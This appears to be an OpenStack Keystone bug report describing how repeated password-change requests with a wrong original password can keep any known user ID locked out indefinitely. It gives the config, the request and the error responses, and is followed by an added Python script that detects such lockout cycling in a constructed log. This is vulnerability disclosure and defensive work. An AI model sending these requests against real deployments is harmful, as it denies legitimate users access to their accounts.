Comment 0 for bug 1688137

Samuel de Medeiros Queiroz (samueldmq) wrote : Attacker may use self-service password reset to lock out users indefinitely

This relates to PCI DSS features added in the Newton release.

keystone.conf:
[security_compliance]
# Setting the account lockout threshold
lockout_failure_attempts = 2
lockout_duration = 10

Try to change a user's password on their behalf:

POST /v3/users/<user_id>/password
{
 "user": {
  "original_password": "fake_password",
  "password": "new_password"
 }
}

As the original password is wrong (the attacker does not know it), after lockout_failure_attempts attempts that user account gets locked out for lockout_duration.

Before lockout_failure_attempts attempts, you get:

{
  "error": {
    "code": 401,
    "title": "Unauthorized",
    "message": "The request you have made requires authentication."
  }
}

After lockout_failure_attempts attempts, you get:

{
  "error": {
    "code": 401,
    "title": "Unauthorized",
    "message": "The account is locked for user: 94ab353983174b04955fc9842779b085."
  }
}

This can be used by an attacker to lock out users (if they have access to user IDs) indefinitely by locking out users again and again after lockout_duration has passed.
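A detection check for the lockout-cycling pattern described in this report, added here as an example; it is not part of the bug report or of Keystone itself. It assumes a constructed log format (an ISO timestamp followed by the "The account is locked for user: <id>." message quoted above; real Keystone log lines differ) and reuses the lockout_duration of 10 seconds from the keystone.conf in the report. It flags a user ID whose lockouts recur right after each lockout expires, which is what an attacker repeating the password-change request looks like from the server side, as opposed to a single lockout caused by a user's own typos.

```python
"""
Detect repeated lockout cycling of a single Keystone user account.

Added example, not code from the bug report or the Keystone project.
The log format below is constructed for this example: ISO timestamp,
then a free-text message containing the lockout error from the report.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# From the report's keystone.conf: lockout_duration = 10 (seconds).
LOCKOUT_DURATION = timedelta(seconds=10)
# Number of back-to-back lockouts before we treat it as abuse (assumption).
REPEAT_THRESHOLD = 3

LOCK_RE = re.compile(
    r"^(?P<ts>\S+) .*The account is locked for user: (?P<uid>[0-9a-f]{32})\."
)

# Constructed sample log. The first user (ID taken from the report) is
# locked three times, each time just after the previous lockout expires.
# The second user (placeholder ID) is locked once, which is benign on its own.
SAMPLE_LOG = """\
2017-05-04T10:00:00 keystone WARNING The account is locked for user: 94ab353983174b04955fc9842779b085.
2017-05-04T10:00:11 keystone WARNING The account is locked for user: 94ab353983174b04955fc9842779b085.
2017-05-04T10:00:22 keystone WARNING The account is locked for user: 94ab353983174b04955fc9842779b085.
2017-05-04T10:05:00 keystone WARNING The account is locked for user: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.
"""


def parse_lockouts(text):
    """Return {user_id: [lockout timestamps]} parsed from log text."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = LOCK_RE.match(line)
        if m:
            events[m.group("uid")].append(datetime.fromisoformat(m.group("ts")))
    return events


def find_cycled_lockouts(events, duration=LOCKOUT_DURATION,
                         threshold=REPEAT_THRESHOLD, slack=timedelta(seconds=5)):
    """Return {user_id: longest run} for users whose consecutive lockouts are
    spaced no more than duration + slack apart at least `threshold` times.

    A lockout that is re-triggered as soon as lockout_duration has passed is
    the signature of the indefinite lock-out described in the report; a lone
    lockout, or lockouts minutes apart, is left alone.
    """
    flagged = {}
    for uid, stamps in events.items():
        stamps = sorted(stamps)
        run = best = 1
        for prev, cur in zip(stamps, stamps[1:]):
            if cur - prev <= duration + slack:
                run += 1
                best = max(best, run)
            else:
                run = 1
        if best >= threshold:
            flagged[uid] = best
    return flagged


if __name__ == "__main__":
    for uid, count in find_cycled_lockouts(parse_lockouts(SAMPLE_LOG)).items():
        print(f"possible lockout cycling against user {uid}: {count} lockouts in a row")
```

Run against real logs, the same check would be fed from the Keystone API log rather than the constructed string; the threshold and slack values are tuning knobs, not anything the report specifies.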